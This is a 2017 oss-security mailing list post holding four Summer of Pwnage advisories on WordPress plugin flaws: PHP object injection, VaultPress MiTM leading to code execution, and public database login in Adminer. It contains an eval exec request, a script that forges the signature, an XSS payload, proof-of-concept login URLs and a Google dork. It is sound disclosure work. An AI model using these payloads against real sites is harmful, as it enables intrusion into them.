Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 1 Mar 2017 07:17:51 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting various WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.




------------------------------------------------------------------------
Analytics Stats Counter Statistics WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Analytics Stats
Counter Statistics WordPress Plugin, which can be used by an
unauthenticated user to instantiate arbitrary PHP Objects. Using this
vulnerability it is possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160803-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Analytics Stats Counter
Statistics [2] WordPress Plugin version 1.2.2.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Analytics Stats Counter Statistics [2] WordPress Plugin analyses
visitors statistics on a WordPress site. A PHP Object injection [3]
vulnerability was found in the Analytics Stats Counter Statistics
WordPress Plugin, which can be used by an unauthenticated user to
instantiate arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
wpadm_unpack() method. The input is taken directly from the POST request
as can be seen in the following code fragment:

wpadm.php:

if ( ! function_exists( 'wpadm_run' )) {
	function  wpadm_run($pl, $dir) {
		@set_time_limit(0);
		require_once dirname(__FILE__) . '/class-wpadm-method-class.php';
		$request_name = 'wpadm_'.$pl.'_request';
		if( isset( $_POST[$request_name] ) && ! empty ( $_POST[$request_name]
) ) {
			require_once dirname(__FILE__) . '/class-wpadm-core.php';
			$wpadm = new WPAdm_Core(wpadm_unpack($_POST[$request_name]), $pl,
$dir);
			echo '<wpadm>'.wpadm_pack($wpadm->getResult()->toArray()).'</wpadm>';
			exit;
		}
	}
}
	
	
if ( ! function_exists( 'wpadm_unpack' )) {
	/**
	 * @param str $str
	 * @return mixed
	 */
	function wpadm_unpack( $str ) {
		return unserialize( base64_decode( $str ) );
	}
}

It has been confirmed that this issues can be used to execute arbitrary
PHP code.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/analytics_stats_counter_statistics_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/stats-counter/
[3] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
Simple Ads Manager WordPress plugin unauthenticated PHP Object injection
vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Simple Ads Manager
WordPress plugin. The unauthenticated PHP Object injection vulnerability
can be used by an unautenthicated user to instantiate arbitrary PHP
Objects. This issue can potentially result in arbitrary code execution,
but this has not been confirmed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0041

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Simple Ads Manager [2]
WordPress plugin version 2.9.8.125.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Simple Ads Manager [2] WordPress Plugin is an easy to use plugin
providing a flexible logic of displaying advertisements. A PHP Object
injection [3] vulnerability was found in Simple Ads Manager WordPress
plugin. The unauthenticated PHP Object injection vulnerability can be
used by an unautenthicated  user to instantiate arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to two unsafe calls to unserialize() in the
sam-ajax-loader.php file. The input is taken directly from the POST
request as can be seen in the following code fragment:

sam-ajax-loader.php:

if ( in_array( $action, $allowed_actions ) ) {
	switch ( $action ) {
		case 'sam_ajax_load_place':
			echo json_encode( array( 'success' => false, 'error' =>
'Deprecated...' ) );
			break;
	
		case 'sam_ajax_load_ads':
			if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) &&
isset( $_POST['wc'] ) ) {
				$clauses = unserialize( base64_decode( $_POST['wc'] ) );

This issue can potentially result in arbitrary code execution, but this
has not been confirmed.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/simple_ads_manager_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/simple-ads-manager/
[3] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
VaultPress - Remote Code Execution via Man in The Middle attack
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Man in The Middle (MiTM) vulnerability has been identified in the
VaultPress plugin of WordPress. This issue allows an attacker to to
sniff clear-text communication and to run arbitrary PHP code on the
affected WordPress host.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160728-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on VaultPress [2] WordPress Plugin
version 1.8.4

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The VaultPress plugin with site is a plugin that enables you to easily
backup your WordPress installation to the VaultPress cloud. In addition
it offers various security features, by scanning your WordPress system
for potential security issues.

A Man in The Middle (MiTM) vulnerability was found in the VaultPress [2]
plugin of WordPress. This issue allows an attacker to to sniff
clear-text communication and to run arbitrary PHP code on the affected
WordPress host.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
However SSL is used to communicate with the VaultPress backend
(www.vaultpress.com [3]), the SSL certificate is not verified. Because
of this it is possible for an attacker to sniff clear-text communication
and to run arbitrary PHP code on the affected WordPress host.

The VaultPress plugins communicates with the https://www.vaultpress.com
backend during registration, backups etcetera. Because the SSL
connection is not verified, a Man in The Middle can intercept, read and
modify traffic.

From a code perspective, when the query() method of the
VaultPress_IXR_SSL_Client class is called and the WP_Http class has been
defined, the sslverify attribute is set to false.

The vulnerable code in the
vaultpress/class.vaultpress-ixr-ssl-client.php file is listed below:


[..]
		if ( class_exists( 'WP_Http' ) ) {
			$args = array(
				'method' => 'POST',
				'body' => $xml,
				'headers' => $this->headers,
<b>-->				'sslverify' => false,</b>
				);
			if ( $this->timeout )
[..]


There are a number of ways a Man in The Middle can exploit this issue to
execute arbitrary code on a vulnerable WordPress host running
VaultPress.

------------------------------------------------------------------------
Attack vector targeting vulnerable instance during registration using
PHP's eval() function
------------------------------------------------------------------------
If the MiTM attack is executed during registration (happens only once)
the secret returned by the VaultPress server can be intercepted. Once
obtained, the key can be used to communicatie with the WordPress host's
exposed VaultPress API.

For example the following VaultPress API method allows to run any
specified PHP code remotely via eval().


[..]
		switch ( $_GET['action'] ) {
			default:
				die();
				break;
-->			case 'exec':
-->				$code = $_POST['code'];
				if ( !$code )
					$this->response( "No Code Found" );
-->				$syntax_check = @eval( 'return true;' . $code );
				if ( !$syntax_check )
					$this->response( "Code Failed Syntax Check" );
				$this->response( eval( $code . ';' ) );
				die();
				break;
[..]

The above code can be triggered using the following request:

POST /wp-load.php?vaultpress=true&action=exec HTTP/1.1
Host: <target>
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
	
code=phpinfo();&signature=5f3db7516912e6b30422a17c1d0bf49beedd6de8:

Please note that a valid signature is required. To create it, the secret
value is needed, which seems to be exchanged during registration only.
So this only affects installations that were targeted by a MiTM during
registration.

The following little PHP script can be used to create the signature:

<?php
/**
** Generate Vaultpress API signature using MiTM'd secret
**/
	
$secret = "MITMD SECRET HERE";
$uri = "?vaultpress=true&action=exec";
$sig = ":";
$post = Array
(
	'code' => "phpinfo();",
);
	
ksort( $post );
$sig = explode( ':', $sig );
$to_sign = serialize( array( 'uri' => $uri, 'post' => $post ) );
$signature = hash_hmac( 'sha1', "$to_sign:", $secret );
	
echo "Signature :". $signature;
?>

------------------------------------------------------------------------
Attack vector targeting vulnerable instance after registration using
script injection
------------------------------------------------------------------------
If a MiTM attack is launched against a host which is already registered,
the secret value cannot be intercepted. However, during any
communication initiated by a user from the VaultPress plugin page (for
example during backups) messages are exchanged between the WordPress
host and the vaulpress.com backend. 

Responses from the server lack any encoding when shown in the plugin's
dashboard HTML pages. This allows a MiTM to inject scripting code in the
target user's WordPress Admin panel. Effectively this allows an attacker
to take over the WordPress admin account or to (indirectly) run
arbitrary PHP code on the WordPress host.

An example of objects lacking output encoding are the ui_message
objects. The vulnerable code in the vaultpress/vaultpress.php file is as
follows:

		<div id="vp-notice" class="vp-notice vp-<?php echo $type; ?> wrap
clearfix">
			<div class="vp-message">
-->				<h3><?php echo $heading; ?></h3>
-->				<p><?php echo $message; ?></p>
			</div>
		</div>


To exploit this the following XML (faultcode) can be returned using an
XML API call via a MiTM attack. Note the scripting code in the
faultString field.


<?xml version="1.0"?>
<methodResponse>
	<fault>
		<value>
			<struct>
				<member>
				   <name>faultCode</name>
				   <value><int>-5</int></value>
				</member>
				<member>
				   <name>faultString</name>
-->				  
<value><string><![CDATA[<script>alert("XSS");</script>]]></string></value>
				</member>
			</struct>
		</value>
	</fault>
</methodResponse>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/vaultpress___remote_code_execution_via_man_in_the_middle_attack.html
[2] https://wordpress.org/plugins/vaultpress/
[3] https://www.vaultpress.com
------------------------------------------------------------------------
WordPress Adminer plugin allows public (local) database login
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The Adminer WordPress plugin allows public login to the site's editor.
As a result this allows an attacker to connect to any database running
on the local host or on internal systems which are accessible from the
target WordPress server.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160728-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Adminer [2] WordPress Plugin
version 1.4.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Currently no fix for this issue is available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Adminer WordPress plugin is a full-featured MySQL management tool
based on the Adminer project [3]. The plugin allows fast database
management for WordPress admins. After installation of the plugin your
database can be managed easily from within the WordPress Dashboard via
the Tools -> Adminer menu option. This issue allows an attacker to
connect to any database running on the local host or on internal systems
which are accessible from the target WordPress server.

Please note that an attacker still needs to login (for example using
username and password) to the target database. However, many site owners
probably do not know or do not expect that anyone out there can try to
login by using various password combinations to their (local) WordPress
database. Often local or internal databases have weak credentials
assigned to them.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists due to the fact that the Adminer WordPress plugin
exposes a publicly accessible interface (Adminer editor) that can be
used by anyone on the web to authenticate against the site’s database
directly. No login to the WordPress dashboard or admin login is
required. It seems that the Adminer editor component was added about 5
months ago.

An attacker can also specify the target host:port combination of the
database to connect to, which allows him to connect to any database
running on the local host or on internal systems which are accessible
from the target WordPress server.

The script has a measure in place to limit brute-force attacks. Upon 30
connection attempts from a single IP this IP will be blocked for 30
minutes.

The script can be found at the following location (change URL to your
WordPress site):
http://wp-site.com/wp-content/plugins/adminer/inc/editor/index.php

Using Google many sites can be found that have a publicly accessible
database login page exposed:
https://www.google.nl/search?q=inurl:/adminer/inc/ [4]

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
- http://<target>/wp-content/plugins/adminer/inc/editor/index.php
- http://<target>/wp-content/plugins/adminer/inc/editor/index.php?server=10.0.0.1&username=root&db=wordpress&password=root

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/wordpress_adminer_plugin_allows_public__local__database_login.html
[2] https://wordpress.org/plugins/adminer/
[3] https://www.adminer.org/en/editor/
[4] https://www.google.nl/search?q=inurl:/adminer/inc/

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ